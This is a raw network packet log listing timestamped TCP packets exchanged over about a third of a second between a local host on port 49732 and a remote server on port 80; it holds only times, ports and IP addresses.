Apr 26, 2024 23:16:30.651540041 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651568890 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651604891 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651607037 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651643991 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651681900 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651720047 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651721001 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651757002 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651772022 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651793957 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651832104 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651839972 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651871920 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651909113 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651941061 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652020931 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652060986 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652064085 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652136087 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652173996 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652179003 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652211905 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652249098 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652250051 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652286053 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652323008 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652323961 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652360916 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652398109 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652400017 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652472019 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652513027 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652518988 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652616978 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652651072 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652656078 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652693033 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652730942 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652733088 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652769089 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652806044 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652806044 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652842999 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652879953 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652880907 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.652916908 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.652956963 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.823200941 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823268890 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823307991 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823319912 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.823352098 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823395014 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.823508978 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823545933 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823585987 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.823585987 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823623896 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823668003 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.823688030 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823725939 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823762894 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.823762894 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823801994 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823841095 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823842049 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.823879957 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823925972 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.823951960 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.823990107 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824029922 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824031115 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824069977 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824111938 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824141026 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824179888 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824218988 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824223042 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824256897 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824294090 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824299097 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824331999 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824369907 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824373007 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824409008 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824446917 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824446917 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824484110 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824522972 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824523926 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824563026 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824600935 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824604034 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824639082 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824676991 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824682951 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824714899 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824752092 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824754000 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824789047 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824829102 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824831009 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824867010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824903965 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824913979 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.824940920 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824979067 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.824987888 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825018883 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825053930 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825057983 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825097084 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825134039 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825135946 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825171947 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825210094 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825211048 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825248003 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825284958 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825287104 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825323105 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825359106 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825365067 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825397015 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825434923 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825462103 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825472116 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825509071 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825511932 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825546980 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825583935 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825587034 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825624943 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825663090 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825665951 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825701952 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825738907 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825742960 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825776100 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825813055 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825814009 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825851917 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825889111 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825891018 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.825926065 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825963974 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.825968027 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.826003075 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826040983 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826042891 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.826081038 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826117992 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826123953 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.826154947 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826191902 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826196909 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.826230049 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826270103 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826273918 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.826308012 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826345921 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826348066 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.826383114 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826421022 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826440096 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.826459885 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.826502085 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.994724035 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.994779110 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.994818926 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.994832993 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.994904041 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.994951010 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.994960070 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.995059013 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.995100975 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.995102882 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.995176077 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.995232105 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.995645046 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.995718956 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.995758057 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.995807886 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.995883942 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.995925903 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.997741938 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.997782946 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.997823000 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.997860909 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.997936010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.997984886 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.997987032 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998060942 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998100042 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.998181105 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998219967 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998270035 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.998302937 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998373985 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998419046 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.998466969 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998539925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998577118 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998581886 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.998663902 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998704910 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.998724937 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998816013 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998853922 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.998930931 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.998970032 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999008894 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.999064922 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999151945 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999201059 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.999209881 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999289036 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999327898 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999330044 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.999430895 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999497890 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.999516010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999589920 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999627113 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999634981 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.999716997 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999758005 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.999798059 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999869108 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999908924 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.999912024 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.999985933 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000024080 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000036001 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.000157118 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000207901 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.000269890 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000341892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000406027 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.000427961 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000498056 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000538111 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000540972 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.000639915 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000679970 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.000679970 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000777960 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000828981 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.000871897 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000942945 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.000988960 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.001029015 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001101017 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001147985 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.001189947 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001291037 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001338959 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.001342058 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001414061 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001458883 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.001465082 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001537085 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001585007 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.001606941 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001710892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001777887 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001790047 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.001880884 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.001924992 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.001951933 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002058029 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002101898 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.002145052 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002228022 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002279043 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.002299070 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002371073 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002413988 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.002450943 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002523899 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002563000 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.002656937 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002696037 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002737999 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.002811909 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002913952 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.002962112 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.003001928 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.003077030 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.003129959 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.003165960 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.003238916 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.003287077 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.003330946 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.003401995 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.003447056 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.003859997 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.004363060 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.004400015 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.004411936 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.004492998 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.004538059 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.004656076 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005122900 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005170107 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.005404949 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005506992 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005553961 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.005582094 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005620956 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005667925 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.005742073 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005815983 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005860090 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.005906105 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.005995035 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006042004 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.006093979 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006186008 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006237984 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.006242037 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006311893 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006354094 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.006402016 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006503105 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006540060 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.006563902 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006635904 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006683111 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.006731987 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006834984 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.006881952 CEST	49732	80	192.168.2.4	146.19.106.236
